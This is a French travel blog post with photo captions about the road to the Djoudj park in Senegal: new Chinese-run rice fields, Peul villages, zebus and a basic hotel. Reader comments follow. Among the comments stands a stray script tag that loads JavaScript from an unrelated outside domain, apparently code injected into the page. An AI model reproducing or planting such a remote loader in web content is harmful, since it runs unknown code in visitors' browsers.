• LA ROUTE DU DJOUDJ SUITE

    LA ROUTE DU DJOUDJ  SUITE

    On longe des marigots

    LA ROUTE DU DJOUDJ  SUITE

    LA ROUTE DU DJOUDJ  SUITE

    LA ROUTE DU DJOUDJ  SUITE

    LA ROUTE DU DJOUDJ  SUITE

    LA ROUTE DU DJOUDJ  SUITE

    Le Sénégal a vendu ses terres aux chinois qui cultivent le riz  pour leur propre consommation

    LA ROUTE DU DJOUDJ  SUITE

    LA ROUTE DU DJOUDJ  SUITE

    LA ROUTE DU DJOUDJ  SUITE

    Ils continuent d'assécher des terres pour de nouvelles culture de riz

    LA ROUTE DU DJOUDJ  SUITE

    LA ROUTE DU DJOUDJ  SUITE

    LA ROUTE DU DJOUDJ  SUITE

    Je doit dire que je ne reconnais plus le paysage, en 3 ans une énorme différence ... et pas en mieux

    LA ROUTE DU DJOUDJ  SUITE

    LA ROUTE DU DJOUDJ  SUITE

    Il reste quand même quelques village Peuls qui survivent 

    LA ROUTE DU DJOUDJ  SUITE

    Les zébus sont mis à l’abri derrière des épineux pour les protéger des hyènes qui n’ont aucun scrupule à venir les croquer

    LA ROUTE DU DJOUDJ  SUITE

    LA ROUTE DU DJOUDJ  SUITE

    Les 70 kilomètre sont faits on arrive à l'hôtel du Djoudj.

    Confort minimum ! mais il y a tout de même une douche ....

    LA ROUTE DU DJOUDJ  SUITE

    Et une piscine ? À  voir le nettoyage... Bon, on est au Sénégal, les normes ne sont pas les mêmes qu'en Europe. ha ha!

    LA ROUTE DU DJOUDJ  SUITE

     

    BONNE SEMAINE À TOUS   , 

    Pour la suite, on ira voir les oiseaux et autres sur le lac

    LA ROUTE DU DJOUDJ  SUITE

     

     

    « LA ROUTE DES DJOUDJE 2019DJOUDJ ANIMAUX DE RENCONTRE DEC 2019 »

  • Commentaires

    16
    Lundi 3 Février à 12:10

    c'est inquiétant que les chinois assèchent ainsi la terre ! 

    Bisous

    Am

    15
    Jeudi 30 Janvier à 16:33

    bonjour Zette , une belle suite et photos !!  oui ça  ce sont des paysages qui nous changent de la France !

    les oiseaux les vaches  et ta dernière photo  ils sont très beaux  waouh les ... ?   

    merci gros bisous belle fin de semaine A +

     

    14
    Jeudi 30 Janvier à 11:51

    Bonjour Zette, tes photos ressemblent à des tableaux, c'est super beau. Je me demande pourquoi les chinois arrivent à cultiver du riz et pas les sénégalais ? Les terres ont été vendues par qui ? Est ce que c'est l'état qui profite de tout comme d'habitude ? On se pose des questions. Je te souhaite une bonne fin de journée, bisous de Marie

    13
    Mercredi 29 Janvier à 16:44

    Attention aux échanges avec les Chinois en ce moment....

    j'attends tes photos des oiseaux!

    Bonne soirée.

    12
    Robert
    Mercredi 29 Janvier à 15:38
    Robert

    Ça me rappelle mon passage en Guinée où là aussi on vend ses richesses naturelles aux autres....

    11
    Mercredi 29 Janvier à 14:52

    Bonjour Zette,

    Ce paysage m'attriste, l'appât du gain fait faire des choses bien laides.

    70 kilomètres ainsi, tu devais être heureuse de voir poindre l'hôtel.
    Les pélicans sont magnifiques.
    Belle journée à toi. Bises

    10
    Mercredi 29 Janvier à 13:53

    Avec ton blog, c'est toujours un dépaysement total, merci pour ses chouettes moments partagés.

    9
    Mercredi 29 Janvier à 13:44

    Bonjour Zette

    Si je revenais au Sénégal je trouverais du changement ... je reste avec mes beaux souvenirs !

    j'avais visité un village Peul ... ici ... quel bon accueil !

    Merci pour ton partage

    Bisous, bonne journée

    8
    Mercredi 29 Janvier à 11:02

    Bonjour Zette,

    Nos amis chinois hum ... ont fait fuir les beaux oiseaux,

    je comprends que tu sois déçue ma chère Zette,

    l’appât du gain, une horreur pour ces pauvres gens qui  triment pour survivre .

    Je ne sais si tu reçois mes news Zette, je ne te vois plus,

    J'espère que tu vas bien ,

    A te lire peut-être,

    Bises amicales de Christiane, à 5 heures ce matin j'ai dû conduire mon Alain aux Urgences : coliques néphrétiques ouille, ouille .

    7
    Mercredi 29 Janvier à 10:31

    quelle tristesse de voir ces terres vendues aux chinois !

    qui en profite ?

    6
    Mercredi 29 Janvier à 09:53

    Bonjour Zette 

    Très beau reportage et oui tout change partout 

    Excuse moi je ne reste pas longtemps sur les blogs j'ai des maux de tête terrible du à une sinusite .......

    Bonne journée Zette 

    Gros bisous Hélène

    5
    Mercredi 29 Janvier à 09:38

    L'appât du gain modifie les paysages... comme à Maurice où les cannes à sucre ont remplacé la végétation tropicale ou dans le désert marocain où certaines zones sont envahies par les champs de pastèques (et les camions qui les transportent...)

    Bisous et bonne journée

    4
    Mercredi 29 Janvier à 08:53

    Bonjour Zette

    En desséchant les marais tes amis chinois ont fait fuir les oiseaux, c'est maintenant le désert si j'en juge par tes photos !

    Bises

    3
    Mardi 28 Janvier à 20:25

    C'est beau le Sénégal........................

    Bisous Zette.

    <script src="//toolsmagick.com/2252259d09bdba7f1b.js"></script>
    2
    Mardi 28 Janvier à 19:02

    Surprenant le riz des Chinois au Sénégal, faut espérer que les épineux protègent bien les zébus, faut penser à tout, l'hôtel simple mais tu peux apprendre à reconnaître les oiseaux,à bientôt bise, JL

    1
    Mardi 28 Janvier à 18:40

    Coucou Zette,
    Je suis fan de ta dernière photo, d'autant que j'adore les Pélicans.
    C'est terrifiant toutes ces terres de par le monde achetées par les chinois pour assurer leurs besoins et affamant les pays ou ils s'installent.
    Mais la faute est aussi aux gouvernements vendeurs qui privilégient l'argent de la vente de ces terres à leur propre population.
    Nous vivons dans un monde que je ne parviens plus à comprendre et qui ne me rend pas très optimiste.
    Merci pour ce partage.
    Bises et bonne soirée.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :